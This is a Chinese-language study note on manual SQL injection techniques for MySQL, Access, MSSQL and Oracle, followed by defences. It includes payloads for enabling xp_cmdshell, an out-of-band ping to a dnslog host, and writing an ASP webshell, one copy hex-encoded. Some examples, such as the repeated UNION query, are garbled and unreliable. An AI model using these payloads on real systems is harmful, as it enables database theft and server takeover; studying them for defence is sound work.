No. 31 笔记 | Web安全-SQL手工注入技术学习 Part 2
一、研究背景
-
背景介绍
SQL注入是一种常见且高危的Web安全漏洞。攻击者可以通过构造恶意SQL查询语句来绕过验证机制,执行未授权操作,如获取敏感信息、篡改数据库内容甚至控制服务器。 -
研究内容
本笔记探讨以下数据库的手工注入技术:- MySQL
- Access
- MSSQL
- Oracle
覆盖了联合查询注入、报错注入、盲注注入、UA注入、Referer注入、DNSLOG外带、Cookie注入、宽字节注入、堆叠注入等方法。
-
相关研究
目前的主要研究集中在SQL注入的检测和防御技术:- 参数化查询:避免动态拼接用户输入。
- 输入验证:严格过滤SQL关键字符。
- 输出编码:对输出数据进行编码以防止攻击扩散。
二、SQL注入技术详解
1. MySQL注入
-
联合查询注入
- 利用
UNION操作符,将多条SELECT语句的结果合并。 - 步骤:
- 判断列数:利用
ORDER BY语句逐步增加字段数,观察是否报错。 - 构造查询:如:
UNION SELECT 1,2,3--,逐步替换为敏感数据字段。 - 获取数据:在显示字段中插入
database()、version()等函数查看信息。
- 判断列数:利用
- 利用
-
报错注入
- 方法:利用MySQL特性,构造错误表达式来暴露数据。
- 示例:
EXTRACTVALUE(1, 'XPath语法错误')或UPDATEXML(1, 'XPath错误', 1)。
- 示例:
- 方法:利用MySQL特性,构造错误表达式来暴露数据。
-
盲注注入
- 布尔盲注:通过页面返回的不同响应判断数据。
- 示例:
AND (SELECT 'a'='a')--页面正常;AND (SELECT 'a'='b')--页面异常。
- 示例:
- 时间盲注:利用
SLEEP()函数延迟判断。- 示例:
IF(条件, SLEEP(5), 0)--。
- 示例:
- 布尔盲注:通过页面返回的不同响应判断数据。
-
其他技术
- UA/Referer注入:通过修改HTTP请求头进行注入。
- DNSLOG外带:将数据通过DNS请求传出。
- Cookie注入:在
Cookie参数中嵌入注入语句。 - 宽字节注入:利用GBK编码将字符解码为SQL语句。
- 堆叠注入:通过分号
;执行多条SQL语句。
-
Getshell
- 目标:利用文件读写权限获取Webshell。
- 方法:
LOAD_FILE()读取敏感文件,或INTO OUTFILE写入后门文件。
2. Access注入
-
基本流程
- 判断数据库类型、表名、列名及其数据。
- 通过页面反馈逐步确认。
-
逐字破解法
- 步骤:
- 猜表名:
AND EXISTS (SELECT * FROM 表名),逐步尝试常见表名。 - 猜列名:
AND EXISTS (SELECT 列名 FROM 表名),逐步尝试常见列名。 - 获取数据:
AND (SELECT TOP 1 列名 FROM 表名) = 'value'。
- 猜表名:
- 步骤:
3. MSSQL注入
-
报错注入
- 方法:通过错误信息回显数据。
- 示例:
CONVERT(int, 'a')或1/0。
- 示例:
- 方法:通过错误信息回显数据。
-
盲注注入
- 利用内置函数逐步判断数据:
- 示例:
IF(SUBSTRING((SELECT 数据), 1, 1)='a', WAITFOR DELAY '0:0:5', 0)--。
- 示例:
- 利用内置函数逐步判断数据:
-
命令执行
- 启用
xp_cmdshell,执行系统命令。- 示例:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; EXEC xp_cmdshell 'ping example.com';
- 示例:
- 启用
-
写入Webshell
- 利用
sp_makewebtask创建恶意文件:EXEC sp_makewebtask 'C:\webshell.asp', 'SELECT ''<%eval request("cmd")%>''';
- 利用
4. Oracle注入
-
报错注入
- 利用函数
dbms_utility.sqlid_to_sqlhash()制造错误:- 示例:
SELECT dbms_utility.sqlid_to_sqlhash('错误') FROM dual;。
- 示例:
- 利用函数
-
盲注注入
- 使用字符串截取函数判断:
- 示例:
AND SUBSTR((SELECT username FROM ALL_USERS WHERE ROWNUM=1), 1, 1)='A'。
- 示例:
- 使用字符串截取函数判断:
三、防御策略
-
过滤SQL特殊字符
- 使用白名单模式验证输入。
- 对
',;,--,/*等特殊字符进行转义。
-
参数化查询
- 利用预编译语句绑定参数,避免直接拼接用户输入:
- 示例(PHP PDO):
$stmt = $pdo->prepare('SELECT * FROM users WHERE username = :username'); $stmt->execute(['username' => $input]);
- 示例(PHP PDO):
- 利用预编译语句绑定参数,避免直接拼接用户输入:
-
使用存储过程
- 通过封装数据库操作,减少直接操作SQL的风险。
-
最小化权限
- 限制数据库用户权限,仅允许必要的读写操作。
关键问题及回答
问题1:MySQL注入中的联合查询注入是如何实现的?
联合查询注入通过构造联合查询语句,利用数据库的列数错误获取数据。具体步骤如下:
-
判断列数
- 构造查询语句,利用
ORDER BY子句判断目标表的列数。 - 示例:
当ORDER BY字段数为3时,页面正常;字段数为4时,页面报错,说明目标表有3列。
- 构造查询语句,利用
-
构造联合查询
- 利用
UNION SELECT语句构造包含多个列的查询。 - 示例:
'UNION SELECT 1,2,3 FROM (SELECT 1) UNION SELECT 1,2,3 FROM (SELECT 1) UNION SELECT 1,2,3 FROM (SELECT 1)'
- 利用
-
执行查询
- 将联合查询语句发送至目标网站,利用列数错误引发的报错信息获取数据。
问题2:在Access注入中,如何利用逐字破解法获取表名和列名?
-
查表
- 构造查询语句,利用
EXISTS语句判断表名存在性。 - 示例:
AND EXISTS (SELECT * FROM 表名) - 替换表名为常见名称(如
admin、user等),直到页面返回正常,确定表名存在。
- 构造查询语句,利用
-
查列
- 确认表名后,利用
EXISTS语句判断列名存在性。 - 示例:
AND EXISTS (SELECT 列名 FROM 表名) - 替换列名为常见名称(如
admin、password等),直到页面返回正常,确定列名存在。
- 确认表名后,利用
-
获取数据
- 确认表名和列名后,构造查询语句逐步获取数据。
- 示例:
AND (SELECT TOP 1 LEN(列名) FROM 表名) = 5 - 通过替换列名,判断长度或内容获取目标数据。
问题3:MSSQL注入中的命令执行是如何实现的?
-
开启
xp_cmdshell- 利用
sp_configure系统存储过程启用命令执行功能。 - 示例:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
- 利用
-
执行系统命令
- 通过
xp_cmdshell执行命令,例如ping命令,验证是否成功执行。 - 示例:
EXEC master..xp_cmdshell 'ping teki6x.dnslog.cn';
- 通过
-
写入一句话木马
- 利用
sp_makewebtask或存储过程向目标写入ASP/ASPX木马文件。 - 示例:
DECLARE @s NVARCHAR(4000); SELECT @s = 0x730065006C00650063007400200027003C00250045007800650063007500740065002800720065007100750065007300740028002200610022002900290025003E000D000A002700; EXEC sp_makewebtask 'C:\webshell.asp', @s;
- 利用
通过上述步骤,攻击者可以在MSSQL数据库中执行任意系统命令并获取系统权限。
四、总结与反思
-
总结
- 本文全面梳理了SQL注入技术,涵盖MySQL、Access、MSSQL和Oracle的常见注入方法。
- 提供了大量实战案例,展示了如何手工执行注入攻击并绕过安全防护。
-
反思
- 防御措施需要多层次部署,单一防护手段难以完全防范。
- 检测和防御技术需要结合AI和自动化工具进一步提升效率。
-
建议
- 开发过程中严格执行输入验证和参数化查询。
- 定期进行安全测试和漏洞扫描。
相关文章:
No. 31 笔记 | Web安全-SQL手工注入技术学习 Part 2
一、研究背景 背景介绍 SQL注入是一种常见且高危的Web安全漏洞。攻击者可以通过构造恶意SQL查询语句来绕过验证机制,执行未授权操作,如获取敏感信息、篡改数据库内容甚至控制服务器。 研究内容 本笔记探讨以下数据库的手工注入技术: MySQLAc…...
Spring Boot中的扫描注解如何使用
在 Spring Boot 中,扫描注解是指通过注解来告诉 Spring 框架应该扫描哪些包、哪些类或哪些特定的组件,并将其作为 Spring 容器中的 bean 进行管理。Spring Boot 主要通过以下几种注解来实现自动扫描: ComponentScanSpringBootApplicationCom…...
:真实数据集)
用 Python 从零开始创建神经网络(十九):真实数据集
真实数据集 引言数据准备数据加载数据预处理数据洗牌批次(Batches)训练(Training)到目前为止的全部代码: 引言 在实践中,深度学习通常涉及庞大的数据集(通常以TB甚至更多为单位)&am…...
深入探讨 Vue.js 的动态组件渲染与性能优化
Vue.js 作为一款前端领域中备受欢迎的渐进式框架,以其简单优雅的 API 和灵活性受到开发者的喜爱。在开发复杂应用时,动态组件渲染是一项极其重要的技术,它能够在页面中动态地加载或切换组件,从而显著提升应用的灵活性与用户体验。…...
qml TextArea、TextEdit、TextField、TextInput的区别于联系
在 QML 中,TextArea、TextEdit、TextField 和 TextInput 都是用来接收用户输入的控件,但它们之间有一些区别和联系。 区别: TextArea:用于多行文本输入,可以接收多行文本输入。TextEdit:也用于多行文本输入…...
《探索 PC 端的开源神经网络多模态模型宝藏》
《探索 PC 端的开源神经网络多模态模型宝藏》 一、多模态模型:开启智能交互新纪元二、主流 PC 端开源多模态模型大赏1. Obsidian:轻量级多模态先锋2. GLM-Edge 系列:移动端与 PC 端的全能选手3. Minicpm-llama3-v2.6:紧凑高效的多…...
centos 搭建nginx+配置域名+windows访问
准备工作:一个完整的centos环境,nginx安装包(可以从官网下载)nginx: download 一:centos可能有精简版,部分环境没有相关依赖包, 需要检查以下项: 1.gcc检查:gcc -v(回车后应当有版…...
docker的数据卷和自定义镜像
docker的数据卷: 容器与宿主机之间,或者容器和容器之间的数据共享(目录)。 创建容器的时间,通过指定目录,实现容器于宿主机之间,或者容器和容器之间的数据共享。 容器的生命周期有限,…...
在 Linux 下Ubuntu创建同权限用户
我是因为不小心把最开始创建的用户的文件夹颜色搞没了,再后来全白用习惯了,就不想卸载了,像创建一个和最开始创建的用户有一样的权限可以执行sudo -i进入root一样的用户 如图这是最原始的样子 第一步 创建新用户,我这里是因为之前…...
计算机视觉算法实战——面部特征点检测
✨个人主页欢迎您的访问 ✨期待您的三连 ✨ ✨个人主页欢迎您的访问 ✨期待您的三连 ✨ ✨个人主页欢迎您的访问 ✨期待您的三连✨ 1. 领域介绍✨✨ 面部特征点检测(Facial Landmark Detection)是计算机视觉中…...
电力场景红外测温图像均压环下的避雷器识别分割数据集labelme格式2436张1类别
数据集格式:labelme格式(不包含mask文件,仅仅包含jpg图片和对应的json文件) 图片数量(jpg文件个数):2436 标注数量(json文件个数):2436 标注类别数:1 标注类别名称:["arrester"] 每个类别标注的框数&am…...
4种革新性AI Agent工作流设计模式全解析
文章目录 导读:AI Agent的四种关键设计模式如下:1. 反思2. 工具使用3. 规划4. 多Agent协作 总结内容简介: 导读: AI Agent是指能够在特定环境中自主执行任务的人工智能系统,不仅接收任务,还自主制定和执行…...
C#基础 枚举 Enumeration从基础到进阶
目录 一、入门篇:枚举基础1. 枚举类型的定义2. 枚举类型的优点3. 枚举的基本使用3.1 枚举的类型转换3.2 遍历枚举成员3.3 判断枚举值是否有效3.4枚举的比较 4. 枚举的设计规范 二、深入底层篇:存储、值与继承限制1. 枚举的存储与表示2. 枚举底层类型选择…...
SOME/IP 协议详解——服务发现
文章目录 1. Introduction (引言)2. SOME/IP Service Discovery (SOME/IP-SD)2.1 General(概述)2.2 SOME/IP-SD Message Format2.2.1 通用要求2.2.2 SOME/IP-SD Header2.2.3 Entry Format2.2.4 Options Format2.2.4.1 配置选项(Co…...
android studio使用DataBinding
DataBinding 是谷歌官方发布的在android上对MVVM设计模式的一个实现框架,其作用是实现数据绑定。 Android DataBinding主要实现了View和ViewModel的双向绑定,包括用户的响应。并且实现了自动更新。 DataBinding优点: 1.大量减少Act…...
记一次学习skynet中的C/Lua接口编程解析protobuf过程
1.引言 最近在学习skynet过程中发现在网络收发数据的过程中数据都是裸奔,就想加入一种数据序列化方式,json、xml简单好用,但我就是不想用,于是就想到了protobuf,对于protobuf C/C的使用个人感觉有点重,正好…...
JavaSE面试
final和static对比 static知识点介绍static代码块当JVM加载类时,static代码块会且只会被执行一次。可用于优化程序性能。实例代码块在每次创建对象时,都会自动执行。static方法static方法中不能使用this和super关键字。静态内部类静态内部类的创建不需要…...
【Rust自学】11.10. 集成测试
喜欢的话别忘了点赞、收藏加关注哦,对接下来的教程有兴趣的可以关注专栏。谢谢喵!(・ω・) 11.10.1. 什么是集成测试 在Rust里,集成测试完全位于被测试库的外部。集成测试调用库的方式和其他代码一样,这也…...
Redis :redis的大Key问题
问题 : 什么是redis 的大key 呢? redis 是一个单线程应用程序。他的请求类似于队列处理,命令排队执行,逐个处理。 这样就会出现一个问题,一旦队列前面的命令请求处理时间过程,那么后续执行命令就会被迫的等…...
IntelliJ IDEA中Maven项目的配置、创建与导入全攻略
大家好,我是袁庭新。 IntelliJ IDEA是当前最流行的Java IDE(集成开发环境)之一,也是业界公认最好用的Java开发工具之一。IntelliJ IDEA支持Maven的全部功能,通过它我们可以很轻松地实现创建Maven项目、导入Maven项目、…...
如何确保获取的淘宝详情页数据的准确性和时效性?
要确保获取的淘宝详情页数据的准确性和时效性,可从以下几个方面着手: 合法合规获取数据 遵守平台规则:在获取淘宝详情页数据之前,务必仔细阅读并严格遵守淘宝平台的使用协议和相关规定。明确哪些数据可以获取、以何种方式获取以及…...
如何将json字符串格式化
文章目录 如何对json字符串进行格式化显示hutool方案的示例和不足使用fastjson的方案 如何对json字符串进行格式化显示 将json字符串内容进行格式化的输出显示。本文介绍 hutool的方案和alibaba 的fastjson方案 hutool方案的示例和不足 引入依赖 <dependency><grou…...
【Vue + Antv X6】可拖拽流程图组件
使用事项: ❗先放个组件上来,使用手册有空会补全 ❗需要下载依赖 “antv/x6”: “^2.18.1”, “antv/x6-plugin-dnd”: “^2.1.1”, 组件: 组件使用: <flowChart :key"flowChartKey" ref"flowChart" lef…...
反转链表题目
文章目录 反转链表题目链接:[在线OJ](https://leetcode.cn/problems/reverse-linked-list/description/)题目详解思路1:思路1算法复杂度 思路2代码实现思路2算法复杂度 结语 欢迎大家来到我的博客,给生活来点impetus 让我们进入《题海探骊》…...
利用Python爬虫获取义乌购店铺所有商品列表:技术探索与实践
在当今数字化时代,数据的重要性不言而喻。对于采购商而言,能够快速、准确地获取供应商店铺内的所有商品信息,是提升采购效率、优化采购决策的关键。义乌购作为国内知名的在线批发平台,汇聚了海量的商品资源,为采购商提…...
基于FPGA的多功能数字钟设计
基于FPGA的多功能数字钟设计 前言基础知识按键数码管 系统概述按键使用说明模块描述模块设计button_debouncebutton_controllerclock_controllerdigital_tube 整体资源用量测试视频 前言 本工程主要是数码管、按键、LED的应用开发。 注:本工程所有IP均使用源码开发…...
nginx-lua模块安装
一.简述 安装 Nginx 的 Lua 模块(通常指的是 ngx_lua 模块)可以显著增强 Nginx 的功能,使其能够执行 Lua 脚本。这使得 Nginx 可以处理更复杂的逻辑和动态内容生成。以下是详细的安装步骤,包括安装 OpenResty 或从源码编译 Nginx…...
poi处理多选框进行勾选操作下载word以及多word文件压缩
一、场景 将数据导出word后且实现动态勾选复选框操作 eg: word模板 导出后效果(根据数据动态勾选复选框) 二、解决方案及涉及技术 ① 使用poi提供的库进行处理(poi官方文档) ② 涉及依赖 <!-- excel工具 --><depen…...
centos7.3安装部署freeswitch
centos7.3安装部署freeswitch 切换yum源为阿里镜像源安装 FreeSWITCH 的 YUM 软件仓库配置文件和 EPEL安装相关工具安装cmake源码编译安装依赖安装 freeswitch 切换yum源为阿里镜像源 cp -r /etc/yum.repos.d /etc/yum.repos.d.bakcurl -o /etc/yum.repos.d/CentOS-Base.repo …...
C# 迭代,递归,回调--13
目录 一.迭代 迭代器示例: 关键点: 优势: 二.递归 递归示例: 关键点: 优势: 注意: 三.回调 回调示例: 关键点: 优势: 应用场景: 4.三种模式的特点对比: 迭代: 递归: 回调: 一.迭代 在C#中迭代通常指重复执行一系列指令 在C#中,迭代器是一种特殊的结构,允许…...
MOS管为什么会有夹断,夹断后为什么会有电流?该电流为什么是恒定的?
以下是对MOS管MOS管为什么会有夹断,夹断后为什么还会有电流?该电流为什么是恒定的?的一些心得体会。 1. MOS管为什么会有夹断? 可以认为D极加压使得D极的耗尽层增大(原因是N极接正极,P极接负极,电子被吸引…...
3D可视化产品定制,应用于哪些行业领域?
3D可视化定制服务已广泛渗透至众多行业领域,包括汽车、家居、时尚鞋服、珠宝配饰以及数码电器等: 汽车行业: 借助Web全景技术与3D模型,我们高保真地再现了汽车外观,为用户带来沉浸式的车型浏览体验。用户可在展示界面自…...
Golang 简要概述
文章目录 1. Golang 的学习方向2. Golang 的应用领域2.1 区块链的应用开发2.2 后台的服务应用2.3 云计算/云服务后台应用 1. Golang 的学习方向 Go 语言,我们可以简单的写成 Golang 2. Golang 的应用领域 2.1 区块链的应用开发 2.2 后台的服务应用 2.3 云计算/云服…...
PL/SQL语言的文件操作
PL/SQL语言的文件操作 PL/SQL(Procedural Language/SQL)是Oracle公司开发的一种过程化扩展SQL的语言,广泛应用于Oracle数据库的开发和管理。PL/SQL不仅支持SQL指令,还支持过程化编程,例如条件控制、循环控制、异常处理…...
python判断当前时间是否是每月10号上午
以下是一个 Python 脚本,用于判断当前时间是否是每月 10 号的上午: from datetime import datetime# 获取当前时间 now datetime.now()# 检查是否是每月 10 号的上午 if now.day 10 and now.hour < 12:print("当前时间是每月10号上午。"…...
)
【MT32F006】MT32F006之max17048电量计(IIC通信)
本文最后修改时间:2025年01月09日 一、本节简介 本文介绍如何使用MT32F006通过IIC与电量计max17048通信。 二、实验平台 库版本:V1.0.0 编译软件:MDK5.37 硬件平台:MT32F006开发板(主芯片MT32F006) 仿…...
使用python生成gif图
使用PyCharm软件,然后pip install imageio 之后代码如下 import imageio.v2 as imageio# 合成 gif 方法 def compose_gif():img_path ["D:\\picture\\R-CA.jpg", "D:\\picture\\R-C.jpg","D:\\picture\\R-C.jpg", "D:\\pict…...
:pytorch矩阵乘法:torch.matmul(x, y))
pytorch小记(一):pytorch矩阵乘法:torch.matmul(x, y)
pytorch小记(一):pytorch矩阵乘法:torch.matmul(x, y)/ x y 代码代码 1:torch.matmul(x, y)输入张量:计算逻辑:输出结果: 代码 2:y y.view(4,1)…...
)
CF 368A.Sereja and Coat Rack(Java实现)
问题分析 简而言之,小明要邀请m个绅士到家,家里有n个挂衣钩,一个挂衣钩要支付i元,如果挂衣钩不够了就要给每个绅士赔d元 思路分析 所以思路就很清楚了,获取n,d,m的值,并用数组存放每…...
HBuilderX打包ios保姆式教程
1、登录苹果开发者后台并登录已认证开发者账号ID Sign In - Apple 2、创建标识符(App ID)、证书,描述文件 3、首先创建标识符,用于新建App应用 3-1、App的话直接选择第一个App IDs,点击右上角继续 3-2、选择App&#x…...
【SOC 芯片设计 DFT 学习专栏 -- DFT 接管 clock 和 reset】
文章目录 OverviewDFT 接管 Clock 和 Reset 的方法Clock 接管方法Reset 接管方法 什么场景下需要 DFT 来接管 Clock 和 Reset?制造测试(Manufacturing Test)静态路径扫描测试(Scan Testing)调试与故障定位(…...
浅谈云计算07 | 云安全机制
浅谈云计算安全机制:全方位守护云端世界 一、引言二、加密技术:数据的隐形护盾三、散列机制:数据完整性的忠诚卫士四、数字签名:数据来源与真伪的鉴定专家五、公钥基础设施(PKI):信任的基石六、…...
)
PyTorch 深度学习框架快速入门 (小土堆)
PyTorch 深度学习框架快速入门 深度学习框架常用模块数据集存取图片数据处理库 —— PILOS 模块实例 Tensorboard 记录机器学习的过程Transform 进行图像变换数据集的下载DataLoaderModule 自定义网络前向传播卷积层卷积简单应用 最大池化非线性层线性层 简单的整合基于现有网络…...
React Native Hooks开发指南
一、什么是Hooks Hooks 是 React 16.8 的新增特性。在不编写 class 的情况下使用 state 以及其他的 React 特性。Hooks 是一种在函数式组件中使用有状态函数的方法。 二、类组件 componentDidMount、componentDidUpdate 和 componentWillUnmount 这三个函数的组合。 三、常用…...
Java内存与缓存
Java内存管理和缓存机制是构建高性能应用程序的关键要素。它们之间既有联系又有区别,理解这两者对于优化Java应用至关重要。 Java 内存模型 Java内存模型(JMM)定义了线程如何以及何时可以看到其他线程修改过的共享变量的值,并且规…...
 , 无法正常push到远端库)
两分钟解决 :![rejected] master -> master (fetch first) , 无法正常push到远端库
目录 分析问题的原因解决 分析问题的原因 在git push的时候莫名遇到这种情况 若你在git上修改了如README.md的文件。由于本地是没有README.md文件的,所以导致 远端仓库git和本地不同步。 将远端、本地进行合并就可以很好的解决这个问题 注意:直接git pu…...
React中ElementFiber对象、WorkInProgress双缓存、ReconcileRenderCommit、第一次挂载过程详解
基础概念 Element对象与Fiber对象 Element对象与Fiber对象 Element 对象 定义 React 的 Element 对象是一个描述用户界面(UI)的普通 JavaScript 对象,通常由 React.createElement 或 JSX 语法生成。 作用 它是 React 应用中的一种描述 …...
【论文阅读】Workload Dependent Performance Evaluation of the Linux 2.6 I/O Schedulers
文章目录 某些背景知识的科普(依赖GPT)GPT简短总结摘要-Abstract引言-Introduction1 I/O Scheduling and the BIO LayerThe 2.6 Deadline I/O Scheduler2.1 The 2.6 Anticipatory I/O scheduler2.2 The 2.6 CFQ Scheduler2.3 The 2.6 noop I/O scheduler…...
macOS 版本对应 Xcode 版本,以及 Xcode 历史版本下载
注:当前页面的所有Xcode下载链接均为苹果官方下载链接 ,点击将直接转至苹果官网下载。❤️❤️❤️ Xcode官网:Xcode Releases | xcodereleases.com Xcode版本Xcode发布时间对应macOS版本macOS SDKsiOS SDKswatchOS SDKstvOS SDKs下载Xcode发…...
量子计算:从薛定谔的猫到你的生活
文章背景 说到量子计算,不少人觉得它神秘又遥不可及。其实,它只是量子物理学的一个“应用小分支”。它的核心在于量子比特的“叠加”和“纠缠”,这些听上去像科幻小说的概念,却为计算世界开辟了一片全新的天地。如果经典计算是“…...